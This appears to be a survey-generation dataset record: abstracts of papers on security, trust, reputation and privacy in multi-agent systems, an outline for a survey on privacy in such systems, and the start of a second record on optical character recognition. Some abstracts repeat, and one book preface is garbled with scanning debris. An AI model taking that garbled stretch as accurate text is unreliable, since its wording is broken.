the sociability skills of agents such as agent groups. What is more, none of the listed MAPs provide a mechanism for preserving the privacy of the users (regarding their identities) that run their agents on such MAPs. In this paper, we present the security infrastructure (SI) of the Magentix MAP, which supports agent groups and preserves user identity privacy. The SI is based on identities that are assigned to all the different entities found in Magentix (users, agents and agent groups). We also provide an evaluation of the SI describing an example application built on top of Magentix and a performance evaluation of it. Copyright © 2010 John Wiley & Sons, Ltd. --- paper_title: Network Security Essentials: Applications and Standards paper_content: From the Book: ::: PREFACE: Preface In this age of electronic connectivity, of viruses and hackers, of electronic eavesdropping and electronic fraud, network security has assumed increasing importance. Two trends have come together to make the topic of this book of vital interest. First, the explosive growth in computer systems and their interconnections via networks has increased the dependence of both organizations and individuals on the information stored and communicated using these systems. This, in turn, has led to a heightened awareness of the need to protect data and resources from disclosure, to guarantee the authenticity of data and messages, and to protect systems from network-based attacks. Second, the disciplines of cryptography and network security have matured, leading to the development of practical, readily available applications to enforce network security. Objectives It is the purpose of this book to provide a practical survey of network security applications and standards. The emphasis is on applications that are widely used on the Internet and for corporate networks, and on standards, especially Internet standards, that have been widely deployed. Intended Audience The book is intended for both an academic and a professional audience. As a textbook, it is intended as a one-semester undergraduate course on network security for computer science, computer engineering, and electrical engineering majors. The book also serves as a basic reference volume and is suitable for self-study. Plan of the Book The book is organized in three parts: I. Cryptography: A concise survey of the cryptographic algorithms and protocols i reportunderlyingnetwork security applications, including encryption, hash functions, digital signatures, and key exchange. i See Appen~ II. Network Security Applications: Covers important network security tools and applications, including Kerberos, X.509v3 certificates, PGP, S/MIME, IP Secu- rity, SSL/TLS, SET, and SNMPv3. III. System Security: Looks at system-level security issues, including the threat of and countermeasures for intruders and viruses, and the use of firewalls and trusted systems. This book i A more detailed, chapter-by-chapter summary appears at the end of Chapter ~ (CNS2e). 1. In addition, the book includes an extensive glossary, a list of frequently used detailed an< acronyms, and a bibliography. There are also end-of-chapter problems and sugges- of which co tions for further reading. dards (NSE 3. NSE1e in covers SNh Internet Services for Instructors and Students There is a Web page for this book that provides support for students and instruc tors. The page includes links to relevant sites, transparency masters of figures in the book in PDF (Adobe Acrobat) format, and sign-up information for the book's Internet mailing list. The Web page is at ... --- paper_title: Enforcing security in the AgentScape middleware paper_content: Multi Agent Systems (MAS) provide a useful paradigm for accessing distributed resources in an autonomic and self-directed manner. Resources, such as web services, are increasingly becoming available in large distributed environments. Currently, numerous multi agent systems are available. However, for the multi agent paradigm to become a genuine mainstream success certain key features need to be addressed: the foremost being security. While security has been a focus of the MAS community, configuring and managing such multi agent systems typically remains non-trivial. Well defined and easily configurable security policies address this issue. A security architecture that is both flexible and featureful is prerequisite for a MAS. A novel security policy enforcement system for multi agent middleware systems is introduced. The system facilitates a set of good default configurations but also allows extensive scope for users to develop customised policies to suit their individual needs. An agent middleware, AgentScape, is used to illustrate the system. --- paper_title: Partial identities as a foundation for trust and reputation paper_content: This paper explores the relationships between the hard security concepts of identity and privacy on the one hand, and the soft security concepts of trust and reputation on the other hand. We specifically focus on two vulnerabilities that current trust and reputation systems have: the change of identity and multiple identities problems. As a result, we provide a privacy preserving solution to these vulnerabilities which integrates the explored relationships among identity, privacy, trust and reputation. We also provide a prototype of our solution to these vulnerabilities and an application scenario. --- paper_title: Authentication for Humans paper_content: To authenticate something in the Internet is to verify that its identity is as claimed. Unless the identity itself is meaningful and the user is presented with evidence to support the claim of identity there can be no authentication. Many ef- forts to implement authentication seem to forget this and only focus on the cryp- tographic authentication mechanisms. We describe what is needed in addition to cryptography for authentication to be meaningful to humans, and illustrates this by showing how it can be applied in the Web and WAP architectures. --- paper_title: User centricity: a taxonomy and open issues paper_content: User centricity is a significant concept in federated identity management (FIM), as it provides for stronger user control and privacy. However, several notions of user-centricity in the FIM community render its semantics unclear and hamper future research in this area. Therefore, we consider user-centricity abstractly and establish a comprehensive taxonomy encompassing user-control, architecture, and usability aspects of user-centric FIM. On the systems layer, we discuss user-centric FIM systems and classify them into two predominant variants with significant feature sets. We distinguish credential-focused systems, which advocate offline identity providers and long-term credentials at a user's client, and relationship-focused systems, which rely on the relationships between users and online identity providers that create short-term credentials during transactions. Note that these two notions of credentials are quite different. The further one encompasses cryptographic credentials as defined by Lysyanskaya et al. [30], the latter one federation tokens as used in today's FIM protocols like Liberty.We raise the question where user-centric FIM systems may go--within the limitations of the user-centricity paradigm as well as beyond them. Firstly, we investigate the existence of a universal user-centric FIM system that can achieve a superset of security and privacy properties as well as the characteristic features of both pre-dominant classes. Secondly, we explore the feasibility of reaching beyond user-centricity, that is, allowing a user of a user-centric FIM system to again give away user-control by means of an explicit act of delegation. We do neither claim a solution for universal user-centric systems nor for the extension beyond the boundaries ventures by leveraging the properties of a credential-focused FIM system. --- paper_title: A group-oriented secure multiagent platform paper_content: Security is becoming a major concern in multiagent systems, since an agent's incorrect or inappropriate behaviour may cause non-desired effects, such as money and data loss. Some multiagent platforms (MAP) are now providing baseline security features, such as authentication, authorization, integrity and confidentiality. However, they fail to support other features related to the sociability skills of agents such as agent groups. What is more, none of the listed MAPs provide a mechanism for preserving the privacy of the users (regarding their identities) that run their agents on such MAPs. In this paper, we present the security infrastructure (SI) of the Magentix MAP, which supports agent groups and preserves user identity privacy. The SI is based on identities that are assigned to all the different entities found in Magentix (users, agents and agent groups). We also provide an evaluation of the SI describing an example application built on top of Magentix and a performance evaluation of it. Copyright © 2010 John Wiley & Sons, Ltd. --- paper_title: On agent technology for e-commerce: trust, security and legal issues paper_content: The vision of future electronic marketplaces (e-markets) is that of markets being populated by autonomous intelligent entities—software, trading, e-agents—representing their users or owners and conducting business on their behalf. For this vision to materialize, one fundamental issue that needs to be addressed is that of trust. First, users need to be able to trust that the agents will do what they say they do. Second, they need to be confident that their privacy is protected and that the security risks involved in entrusting agents to perform transactions on their behalf are minimized. Finally, users need to be assured that any legal issues relating to agents trading electronically are fully covered as they are in traditional trading practices. In this paper we consider the barriers for the adoption of agent technology in electronic commerce (e-commerce) which pertain to trust, security and legal issues. We discuss the perceived risks of the use of agents in e-commerce and the fundamental issue of trust in this context. Issues regarding security, and how some of these can be addressed through the use of cryptography, are described. The impact of the use of agent technology on the users' privacy and how it can be both protected as well as hindered by it is also examined. Finally, we discuss the legal issues that arise in agent-mediated e-commerce and discuss the idea of attributing to software agents the status of legal persons or e-persons and the various implications. --- paper_title: Review on Computational Trust and Reputation Models paper_content: The scientific research in the area of computational mechanisms for trust and reputation in virtual societies is a recent discipline oriented to increase the reliability and performance of electronic communities. Computer science has moved from the paradigm of isolated machines to the paradigm of networks and distributed computing. Likewise, artificial intelligence is quickly moving from the paradigm of isolated and non-situated intelligence to the paradigm of situated, social and collective intelligence. The new paradigm of the so called intelligent or autonomous agents and multi-agent systems (MAS) together with the spectacular emergence of the information society technologies (specially reflected by the popularization of electronic commerce) are responsible for the increasing interest on trust and reputation mechanisms applied to electronic societies. This review wants to offer a panoramic view on current computational trust and reputation models. --- paper_title: A Survey of Trust and Reputation Systems for Online Service Provision paper_content: Trust and reputation systems represent a significant trend in decision support for Internet mediated service provision. The basic idea is to let parties rate each other, for example after the completion of a transaction, and use the aggregated ratings about a given party to derive a trust or reputation score, which can assist other parties in deciding whether or not to transact with that party in the future. A natural side effect is that it also provides an incentive for good behaviour, and therefore tends to have a positive effect on market quality. Reputation systems can be called collaborative sanctioning systems to reflect their collaborative nature, and are related to collaborative filtering systems. Reputation systems are already being used in successful commercial online applications. There is also a rapidly growing literature around trust and reputation systems, but unfortunately this activity is not very coherent. The purpose of this article is to give an overview of existing and proposed systems that can be used to derive measures of trust and reputation for Internet transactions, to analyse the current trends and developments in this area, and to propose a research agenda for trust and reputation systems. --- paper_title: Challenges for Robust Trust and Reputation Systems paper_content: The purpose of trust and reputation systems is to strengthen the quality of markets and communities by providing an incentive for good behaviour and quality services, and by sanctioning bad behaviour and low quality services. However, trust and reputation systems will only be able to produce this effect when they are sufficiently robust against strategic manipulation or direct attacks. Currently, robustness analysis of TRSs is mostly done through simple simulated scenarios implemented by the TRS designers themselves, and this can not be considered as reliable evidence for how these systems would perform in a realistic environment. In order to set robustness requirements it is important to know how important robustness really is in a particular community or market. This paper discusses research challenges for trust and reputation systems, and proposes a research agenda for developing sound and reliable robustness principles and mechanisms for trust and reputation systems. --- paper_title: SybilGuard: defending against sybil attacks via social networks paper_content: Peer-to-peer and other decentralized, distributed systems are known to be particularly vulnerable to sybil attacks. In a sybil attack, a malicious user obtains multiple fake identities and pretends to be multiple, distinct nodes in the system. By controlling a large fraction of the nodes in the system, the malicious user is able to ldquoout voterdquo the honest users in collaborative tasks such as Byzantine failure defenses. This paper presents SybilGuard, a novel protocol for limiting the corruptive influences of sybil attacks. Our protocol is based on the ldquosocial networkrdquo among user identities, where an edge between two identities indicates a human-established trust relationship. Malicious users can create many identities but few trust relationships. Thus, there is a disproportionately small ldquocutrdquo in the graph between the sybil nodes and the honest nodes. SybilGuard exploits this property to bound the number of identities a malicious user can create. We show the effectiveness of SybilGuard both analytically and experimentally. --- paper_title: Partial identities as a foundation for trust and reputation paper_content: This paper explores the relationships between the hard security concepts of identity and privacy on the one hand, and the soft security concepts of trust and reputation on the other hand. We specifically focus on two vulnerabilities that current trust and reputation systems have: the change of identity and multiple identities problems. As a result, we provide a privacy preserving solution to these vulnerabilities which integrates the explored relationships among identity, privacy, trust and reputation. We also provide a prototype of our solution to these vulnerabilities and an application scenario. --- paper_title: Smart cheaters do prosper: Defeating trust and reputation systems paper_content: Traders in electronic marketplaces may behave dishonestly, cheating other agents. A multitude of trust and reputation systems have been proposed to try to cope with the problem of cheating. These systems are often evaluated by measuring their performance against simple agents that cheat randomly. Unfortunately, these systems are not often evaluated from the perspective of security---can a motivated attacker defeat the protection? Previously, it was argued that existing systems may suffer from vulnerabilities that permit effective, profitable cheating despite the use of the system. In this work, we experimentally substantiate the presence of these vulnerabilities by successfully implementing and testing a number of such 'attacks', which consist only of sequences of sales (honest and dishonest) that can be executed in the system. This investigation also reveals two new, previously-unnoted cheating techniques. Our success in executing these attacks compellingly makes a key point: security must be a central design goal for developers of trust and reputation systems. --- paper_title: The Social Cost of Cheap Pseudonyms paper_content: We consider the problems of societal norms for cooperation and reputation when it is possible to obtain cheap pseudonyms, something that is becoming quite common in a wide variety of interactions on the Internet. This introduces opportunities to misbehave without paying reputational consequences. A large degree of cooperation can still emerge, through a convention in which newcomers "pay their dues" by accepting poor treatment from players who have established positive reputations. One might hope for an open society where newcomers are treated well, but there is an inherent social cost in making the spread of reputations optional. We prove that no equilibrium can sustain significantly more cooperation than the dues-paying equilibrium in a repeated random matching game with a large number of players in which players have finite lives and the ability to change their identities, and there is a small but nonvanishing probability of mistakes. Although one could remove the inefficiency of mistreating newcomers by disallowing anonymity, this is not practical or desirable in a wide variety of transactions. We discuss the use of entry fees, which permits newcomers to be trusted but excludes some players with low payoffs, thus introducing a different inefficiency. We also discuss the use of free but unreplaceable pseudonyms, and describe a mechanism that implements them using standard encryption techniques, which could be practically implemented in electronic transactions. Copyright (c) 2001 Massachusetts Institute of Technology. --- paper_title: Trust in multi-agent systems paper_content: Trust is a fundamental concern in large-scale open distributed systems. It lies at the core of all interactions between the entities that have to operate in such uncertain and constantly changing environments. Given this complexity, these components, and the ensuing system, are increasingly being conceptualised, designed, and built using agent-based techniques and, to this end, this paper examines the specific role of trust in multi-agent systems. In particular, we survey the state of the art and provide an account of the main directions along which research efforts are being focused. In so doing, we critically evaluate the relative strengths and weaknesses of the main models that have been proposed and show how, fundamentally, they all seek to minimise the uncertainty in interactions. Finally, we outline the areas that require further research in order to develop a comprehensive treatment of trust in complex computational settings. --- paper_title: Sybilproof reputation mechanisms paper_content: Due to the open, anonymous nature of many P2P networks, new identities - or sybils - may be created cheaply and in large numbers. Given a reputation system, a peer may attempt to falsely raise its reputation by creating fake links between its sybils. Many existing reputation mechanisms are not resistant to these types of strategies.Using a static graph formulation of reputation, we attempt to formalize the notion of sybilproofness. We show that there is no symmetric sybilproof reputation function. For nonsymmetric reputations, following the notion of reputation propagation along paths, we give a general asymmetric reputation function based on flow and give conditions for sybilproofness. --- paper_title: A survey of attack and defense techniques for reputation systems paper_content: Reputation systems provide mechanisms to produce a metric encapsulating reputation for a given domain for each identity within the system. These systems seek to generate an accurate assessment in the face of various factors including but not limited to unprecedented community size and potentially adversarial environments. We focus on attacks and defense mechanisms in reputation systems. We present an analysis framework that allows for the general decomposition of existing reputation systems. We classify attacks against reputation systems by identifying which system components and design choices are the targets of attacks. We survey defense mechanisms employed by existing reputation systems. Finally, we analyze several landmark systems in the peer-to-peer domain, characterizing their individual strengths and weaknesses. Our work contributes to understanding (1) which design components of reputation systems are most vulnerable, (2) what are the most appropriate defense mechanisms and (3) how these defense mechanisms can be integrated into existing or future reputation systems to make them resilient to attacks. --- paper_title: Review on Computational Trust and Reputation Models paper_content: The scientific research in the area of computational mechanisms for trust and reputation in virtual societies is a recent discipline oriented to increase the reliability and performance of electronic communities. Computer science has moved from the paradigm of isolated machines to the paradigm of networks and distributed computing. Likewise, artificial intelligence is quickly moving from the paradigm of isolated and non-situated intelligence to the paradigm of situated, social and collective intelligence. The new paradigm of the so called intelligent or autonomous agents and multi-agent systems (MAS) together with the spectacular emergence of the information society technologies (specially reflected by the popularization of electronic commerce) are responsible for the increasing interest on trust and reputation mechanisms applied to electronic societies. This review wants to offer a panoramic view on current computational trust and reputation models. --- paper_title: Trust in multi-agent systems paper_content: Trust is a fundamental concern in large-scale open distributed systems. It lies at the core of all interactions between the entities that have to operate in such uncertain and constantly changing environments. Given this complexity, these components, and the ensuing system, are increasingly being conceptualised, designed, and built using agent-based techniques and, to this end, this paper examines the specific role of trust in multi-agent systems. In particular, we survey the state of the art and provide an account of the main directions along which research efforts are being focused. In so doing, we critically evaluate the relative strengths and weaknesses of the main models that have been proposed and show how, fundamentally, they all seek to minimise the uncertainty in interactions. Finally, we outline the areas that require further research in order to develop a comprehensive treatment of trust in complex computational settings. --- paper_title: Privacy and contextual integrity: framework and applications paper_content: Contextual integrity is a conceptual framework for understanding privacy expectations and their implications developed in the literature on law, public policy, and political philosophy. We formalize some aspects of contextual integrity in a logical framework for expressing and reasoning about norms of transmission of personal information. In comparison with access control and privacy policy frameworks such as RBAC, EPAL, and P3P, these norms focus on who personal information is about, how it is transmitted, and past and future actions by both the subject and the users of the information. Norms can be positive or negative depending on whether they refer to actions that are allowed or disallowed. Our model is expressive enough to capture naturally many notions of privacy found in legislation, including those found in HIPAA, COPPA, and GLBA. A number of important problems regarding compliance with privacy norms, future requirements associated with specific actions, and relations between policies and legal standards reduce to standard decision procedures for temporal logic. --- paper_title: Open issues for normative multi-agent systems paper_content: A challenging problem currently addressed in the multi-agent systems area is the development of open systems; which are characterized by the heterogeneity of their participants and the dynamic features of both their participants and their environment. The main feature of agents in these systems is autonomy. It is this autonomy that requires regulation, and norms are a solution for this. Norms represent a tool for achieving coordination and cooperation among the members of a society. They have been employed in the field of Artificial Intelligence as a formal specification of deontic statements aimed at regulating the actions of software agents and the interactions among them. This article gives an overview of the most relevant works on norms for multi-agent systems. This review considers open multi-agent systems challenges and points out the main open questions that remain in norm representation, reasoning, creation, and implementation. --- paper_title: Introduction to Normative Multiagent Systems paper_content: In this paper we use recursive modelling to formalize sanction-based obligations in a qualitative game theory. In particular, we formalize an agent who attributes mental attitudes such as goals and desires to the normative system which creates and enforces its obligations. The wishes (goals, desires) of the normative system are the commands (obligations) of the agent. Since the agent is able to reason about the normative system’s behavior, our model accounts for many ways in which an agent can violate a norm believing that it will not be sanctioned. The theory can be used in theories or applications that need a model of rational decision making in normative multiagent systems, such as for example theories of fraud and deception, trust dynamics and reputation, electronic commerce, and virtual communities. --- paper_title: Agent Technology for e-Commerce paper_content: List of Figures. List of Tables. Preface. 1 Introduction. 1.1 A paradigm shift. 1.2 Electronic commerce. 1.3 Agents and e-commerce. 1.4 Further reading. 1.5 Exercises and topics for discussion. 2 Software agents. 2.1 Characteristics of agents. 2.2 Agents as intentional systems. 2.3 Making decisions. 2.4 Planning. 2.5 Learning. 2.6 Agent architectures. 2.7 Agents in perspective. 2.8 Methodologies and languages. 2.9 Further reading. 2.10 Exercises and topics for discussion. 3 Multi-agent systems. 3.1 Characteristics of multi-agent systems. 3.2 Interaction. 3.3 Agent communication. 3.4 Ontologies. 3.5 Cooperative problem solving. 3.6 Virtual organisations as multi-agent systems. 3.7 Infrastructure requirements for open multi-agent systems. 3.8 Further reading. 3.9 Exercises and topics for discussion. 4 Shopping Agents. 4.1 Consumer buying behaviour model. 4.2 Comparison shopping. 4.3 Working for the user. 4.4 How shopping agents work. 4.5 Limitations and issues. 4.6 Further reading. 4.7 Exercises and topics for discussion. 5 Middle agents. 5.1 Matching. 5.2 Classification of middle agents. 5.3 Describing capabilities. 5.4 LARKS. 5.5 OWL-S. 5.6 Further reading. 5.7 Exercises and topics for discussion. 6 Recommender systems. 6.1 Information needed. 6.2 Providing recommendations. 6.3 Recommendation technologies. 6.4 Content-based filtering. 6.5 Collaborative filtering. 6.6 Combining content and collaborative filtering. 6.7 Recommender systems in e-commerce. 6.8 A note on personalization. 6.9 Further reading. 6.10 Exercises and topics for discussion. 7 Elements of strategic interaction. 7.1 Elements of Economics. 7.2 Elements of Game Theory. 7.3 Further reading. 7.4 Exercises and topics for discussion. 8 Negotiation I. 8.1 Negotiation protocols. 8.2 Desired properties of negotiation protocols. 8.3 Abstract architecture for negotiating agents. 8.4 Auctions. 8.5 Classification of auctions. 8.6 Basic auction formats. 8.7 Double auctions. 8.8 Multi-attribute auctions. 8.9 Combinatorial auctions. 8.10 Auction platforms. 8.11 Issues in practical auction design. 8.12 Further reading. 8.13 Exercises and topics for discussion. 9 Negotiation II. 9.1 Bargaining. 9.2 Negotiation in different domains. 9.3 Coalitions. 9.4 Applications of coalition formation. 9.5 Social choice problems. 9.6 Argumentation. 9.7 Further reading. 9.8 Exercises and topics for discussion. 10 Mechanism design. 10.1 The mechanism design problem. 10.2 Dominant strategy implementation. 10.3 The Gibbard-Satterthwaite Impossibility Theorem. 10.4 The Groves-Clarke mechanisms. 10.5 Mechanism design and computational issues. 10.6 Further reading. 10.7 Exercises and topics for discussion. 11 Mobile agents. 11.1 Introducing mobility. 11.2 Facilitating mobility. 11.3 Mobile agent systems. 11.4 Aglets. 11.5 Mobile agent security. 11.6 Issues on mobile agents. 11.7 Further reading. 11.8 Exercises and topics for discussion. 12 Trust, security and legal issues. 12.1 Perceived risks. 12.2 Trust. 12.3 Trust in e-commerce. 12.4 Electronic institutions. 12.5 Reputation systems. 12.6 Security. 12.7 Cryptography. 12.8 Privacy, anonymity and agents. 12.9 Agents and the law. 12.10 Agents as legal persons. 12.11 Closing remarks. 12.12 Further reading. 12.13 Exercises and topics for discussion. A Introduction to decision theory. A.2 Making decisions. A.3 Utilities. A.4 Further reading. Bibliography. Index. --- paper_title: Specifying standard security mechanisms in multi-agent systems paper_content: Distributed multi-agent systems propose new infrastructure solutions to support the interoperability of electronic services. Security is a central issue for such infrastructures and is compounded by their intrinsic openness, heterogeneity and because of the autonomous and potentially self-interested nature of the agents therein. This article reviews the work that the FIPA agent standards body has undertaken to specify security in multi-agent systems. This enables a discussion about the main issues that developers have to face at different levels (i.e., intra-platform, inter-platform and application level) when developing agent-based security solutions in various domains. --- paper_title: Privacy enhancing identity management: protection against re-identification and profiling paper_content: User centric identity management will be necessary to protect user's privacy in an electronic society. However, designing such systems is a complex task, as the expectations of the different parties involved in electronic transactions have to be met. In this work we give an overview on the actual situation in user centric identity management and point out problems encountered there. Especially we present the current state of research and mechanisms useful to protect the user's privacy. Additionally we show security problems that have to be borne in mind while designing such a system and point out possible solutions. Thereby, we concentrate on attacks on linkability and identifiability, and possible protection methods. --- paper_title: Privacy and Identity Management paper_content: Creating and managing individual identities is a central challenge of the digital age. As identity management systems defined here as programs or frameworks that administer the collection, authentication, or use of identity and information linked to identity are implemented in both the public and private sectors, individuals are required to identify themselves with increasing frequency. Traditional identity management systems are run by organizations that control all mechanisms for authentication (establishing confidence in an identity claim's truth) and authorization (deciding what an individual should be allowed to do), as well as any behind-the-scenes profiling or scoring of individuals. Recent work has looked toward more user-centric models that attempt to put individuals in charge of when, where, how, and to whom they disclose their personal information. --- paper_title: The Wiki Way: Quick Collaboration on the Web paper_content: Foreword. Preface. Why This Book? Why You Want to Read This. Book Structure. The Authors. Contributors and Colleagues. Errata and Omissions. Contacting Us. Read the Book, Use the Wiki! I. FROM CONCEPTS TO USING WIKI. 1. Introduction to Discussion and Collaboration Servers. In this Chapter. Collaboration and Discussion Tools. Collaboration Models. Who Uses Collaborative Discussion Servers? Whatever For? Features of a Web-Based Collaboration. On the Horizon: WebDAV. Comparing Wiki to Other Collaboration Tools. 2. What's a "Wiki"? The Wiki Concept. The Essence of Wiki. The User Experience. Usefulness Criteria. Wiki Basics. Wiki Clones. Wiki Implementations by Language. Other Wiki Offerings. Non-Wiki Servers. Wiki Application. Pros and Cons of a Wiki-Style Server. Why Consider Setting Up a Wiki? Other Issues. 3. Installing Wiki. QuickiWiki--Instant Serve. Installing Perl. Installing QuickiWiki. Multiple Instances. Wiki and Webserver. Wiki on IIS or PWS. The Apache Webserver. Installing Apache. Reconfiguring Apache. Testing Webserver Wiki. Wrapper Scripts. General Security Issues. Security and Database Integrity. Server Vulnerabilities. Addressing wiki Vulnerabilities. Configuring Your Browser Client. Fonts, Size and Layout. 4. Using Wiki. In this Chapter. Quicki Quick-Start. A Virtual Notebook. Making Wiki Notes, A Walkthrough. Wiki as PIM. A Working Example. The Content Model. Internal and External Hyperlink Models. Browsing Pages. Editing Pages. The Browser Editing Model. Building Wiki Content. Editing and Markup Conventions. 5. Structuring Wiki Content. In this Chapter. Wiki Structure. Structure Types. Only a Click Away. How Hard to Try. When to Impose Structure. When Not to Impose Structure. What is the Purpose of the Wiki? Structure Patterns. When to Spin Off New Wiki Servers. II. UNDERSTANDING THE HACKS. 6. Customizing Your Wiki. In this Chapter. Hacking Your Wiki Source. Copyright and Open Source License Policy. Why Customize? What to Customize. 7. Wiki Components Examined. In this Chapter. Dissecting QuickiWiki. QuickiWiki Component Model. Core QuickiWiki Modules. Sever Component. Optional Extended Components. Analyzing Page Content. Managing User Access. 8. Alternatives and Extensions. Parsing the Requests. ClusterWiki Component Model. The Library Module. Special Features. Spell Checking. Uploading Files. A Standard Wiki? 9. Wiki Administration and Tools. In this Chapter. Events History. Tracking Page Edits. Usage Statistics. Abuse Management. Access Management. Permission Models. Adding Authentication and Authorization. Administering the Database. Page Conversions. Page Management. Backup Issues. Server Resources and Wiki Loading. Avoiding User Waits. Implementing Wiki Constraints. Debugging a Wiki. Programming Resources. Backups. Low-Tech Debugging. Higher-Level Debugging. III. IMAGINE THE POSSIBILITIES. 10. Insights and Other Voices. In this Chapter. Wiki Culture. Wiki as Open Community. Writing Style Contention. Why Wiki Works. The Open-Edit Issue. When Wiki Doesn't Work. Public Wiki Issues. Wiki Style Guidelines. Notifying About Update. Design and Portability. Wiki Trade-Offs. Portability. The Future of Wiki. 11. Wiki Goes Edu. In this Chapter. CoWeb at Georgia Tech. Introduction to CoWeb. CoWeb Usage. Supported CoWeb User Roles. CoWeb Open Authoring Projects. Overall Conclusions. 12. Wiki at Work. In this Chapter. Case Studies. WikiWikiWeb. New York Times Digital. TWiki at TakeFive. TWiki at Motorola. Kehei Wiki Case Studies. A Rotary Wiki. Wiki Workplace Essentials. Why a Workplace Wiki? Planning the Wiki. Selection Stage. Implementation Stage. Day-to-Day Operations. Appendix A: Syntax Comparisons. Hyperlink Anchors. Markup Conventions. Escaped Blocks. HTML Tag Inclusion. Other Syntax Extensions Seen. Appendix B: Wiki Resources. Book Resources. Internet Resources. Appendix C: List of Tips. Index. 020171499XTO5232001 --- paper_title: Information revelation and privacy in online social networks paper_content: Participation in social networking sites has dramatically increased in recent years. Services such as Friendster, Tribe, or the Facebook allow millions of individuals to create online profiles and share personal information with vast networks of friends - and, often, unknown numbers of strangers. In this paper we study patterns of information revelation in online social networks and their privacy implications. We analyze the online behavior of more than 4,000 Carnegie Mellon University students who have joined a popular social networking site catered to colleges. We evaluate the amount of information they disclose and study their usage of the site's privacy settings. We highlight potential attacks on various aspects of their privacy, and we show that only a minimal percentage of users changes the highly permeable privacy preferences. --- paper_title: Designing Virtual Organizations paper_content: Virtual Organizations are a suitable mechanism for enabling coordination of heterogeneous agents in open environments. Taking into account many concepts of the Human Organization Theory, a model for Virtual Organizations has been developed. This model describes the structural, functional, normative and environmental aspects of the system. It is based on four main concepts: organizational unit, service, norm and environment. All these concepts have been applied in a case-study example for the management of a travel agency system. --- paper_title: Privacy-Preserving Query Answering in Logic-based Information Systems paper_content: We study privacy guarantees for the owner of an information system who wants to share some of the information in the system with clients while keeping some other information secret. The privacy guarantees ensure that publishing the new information will not compromise the secret one. We present a framework for describing privacy guarantees that generalises existing probabilistic frameworks in relational databases. We also formulate different flavors of privacy-preserving query answering as novel, purely logic-based reasoning problems and establish general connections between these reasoning problems and the probabilistic privacy guarantees. --- paper_title: To join or not to join: the illusion of privacy in social networks with mixed public and private user profiles paper_content: In order to address privacy concerns, many social media websites allow users to hide their personal profiles from the public. In this work, we show how an adversary can exploit an online social network with a mixture of public and private user profiles to predict the private attributes of users. We map this problem to a relational classification problem and we propose practical models that use friendship and group membership information (which is often not hidden) to infer sensitive attributes. The key novel idea is that in addition to friendship links, groups can be carriers of significant information. We show that on several well-known social media sites, we can easily and accurately recover the information of private-profile users. To the best of our knowledge, this is the first work that uses link-based and group-based classification to study privacy implications in social networks with mixed public and private user profiles. --- paper_title: Privacy-Preserving Data Publishing paper_content: Privacy is an important issue when one wants to make use of data that involves individuals' sensitive information. Research on protecting the privacy of individuals and the confidentiality of data has received contributions from many fields, including computer science, statistics, economics, and social science. In this paper, we survey research work in privacy-preserving data publishing. This is an area that attempts to answer the problem of how an organization, such as a hospital, government agency, or insurance company, can release data to the public without violating the confidentiality of personal information. We focus on privacy criteria that provide formal safety guarantees, present algorithms that sanitize data to make it safe for release while preserving useful information, and discuss ways of analyzing the sanitized data. Many challenges still remain. This survey provides a summary of the current state-of-the-art, based on which we expect to see advances in years to come. --- paper_title: Deriving Private Information from Association Rule Mining Results paper_content: Data publishing can provide enormous benefits to the society. However, due to privacy concerns, data cannot be published in their original forms. Two types of data publishing can address the privacy issue: one is to publish the sanitized version of the original data, and the other is to publish the aggregate information from the original data, such as data mining results. There have been extensive studies to understand the privacy consequence in the first approach, but there is not much investigation on the privacy consequence of publishing data mining results, although, it is well believed that publishing data mining results can lead to the disclosure of private information. We propose a systematic method to study the privacy consequence of data mining results. Based on a well-established theory, the principle of maximum entropy, we have developed a method to precisely quantify the privacy risk when data mining results are published. We take the association rule mining as an example in this paper, and demonstrate how we quantify the privacy risk based on the published association rules. We have conducted experiments to evaluate the effectiveness and performance of our method. We have drawn several interesting observations from our experiments. ---
Title: A Survey of Privacy in Multi-Agent Systems Section 1: Introduction Description 1: Introduce the topic of privacy in multi-agent systems and the importance of safeguarding personal information within these systems. Section 2: Protection against Information Collection Description 2: Discuss mechanisms and strategies for preventing the unwanted collection of sensitive information by agents in multi-agent systems. Section 3: Disclosure Decision Making Description 3: Detail various approaches for agents to decide which information to disclose to other agents, including policy-based and privacy-utility tradeoff methods. Section 4: Secure Data Transfer and Storage Description 4: Explain the importance of securing information transfer and storage to protect privacy and review existing mechanisms in agent platforms. Section 5: Trusted Third Party Computation Description 5: Explore how trusted third parties can mediate information sharing to prevent direct information collection by destination agents. Section 6: Protection against Information Processing Description 6: Survey strategies to minimize and secure the processing of collected information to protect privacy. Section 7: Anonymity Description 7: Define anonymity in the context of multi-agent systems and discuss protocols and technologies that support anonymous communication and problem-solving. Section 8: Anonymity in Multi-agent Problem Solving Description 8: Review algorithms and approaches that ensure anonymity during distributed problem-solving among agents. Section 9: Anonymizers Description 9: Explore technologies like MIX networks and onion routing that anonymize agent communications and prevent traffic analysis. Section 10: Pseudonymity Description 10: Examine the use of pseudonyms to preserve privacy and discuss ad-hoc mechanisms and platform support for pseudonym management. Section 11: Implications in Security Description 11: Discuss how security measures such as authentication and accountability can impact privacy and describe solutions to balance these aspects. Section 12: Implications in Trust and Reputation Description 12: Investigate the role of trust and reputation models in multi-agent systems and how they can support privacy preservation. Section 13: Summary of Proposals against Information Collection Description 13: Summarize the approaches and mechanisms aiming to prevent undesired information collection in multi-agent systems. Section 14: Summary of Proposals against Information Processing Description 14: Summarize the approaches and mechanisms aiming to minimize and protect the processing of sensitive information. Section 15: Protection against Information Dissemination Description 15: Outline strategies based on trust, reputation, and norms to prevent unauthorized dissemination of collected information. Section 16: Open Challenges Description 16: Identify future research directions and open challenges in the field of privacy preservation in multi-agent systems. Section 17: Conclusions Description 17: Conclude the survey by summarizing the key points and emphasizing the importance of incorporating privacy preservation mechanisms in multi-agent systems.
A Survey on Optical Character Recognition System
9
--- paper_title: Survey and bibliography of Arabic optical text recognition paper_content: Abstract Research work on Arabic optical text recognition (AOTR), although lagging that of other languages, is becoming more intensive than before and commercial systems for AOTR are becoming available. This paper presents a comprehensive survey and bibliography of research on AOTR, by covering all the research publications on AOTR to which the authors had access. This paper introduces the general topic of optical character recognition (OCR), and highlights the characteristics of Arabic text. It also presents an historical review of the Arabic text recognition systems. Further, this paper reports on the state of the art in AOTR research, and lists the specifications of commercially available systems for AOTR. In this paper, we first underline the capabilities of different AOTR systems, and then introduce a five stage model for AOTR systems and classify research work according to this model. We devote a section to each of the stages of this model: preprocessing, segmentation, feature extraction, classification, and post-processing. In the preprocessing section, we emphasize handling degraded documents, and thinning of Arabic text. In the segmentation section, we discuss methods of segmenting Arabic text and categorize the methods into five general approaches. In the feature extraction and classification sections, we highlight the main techniques and analyze AOTR research works based on those techniques. 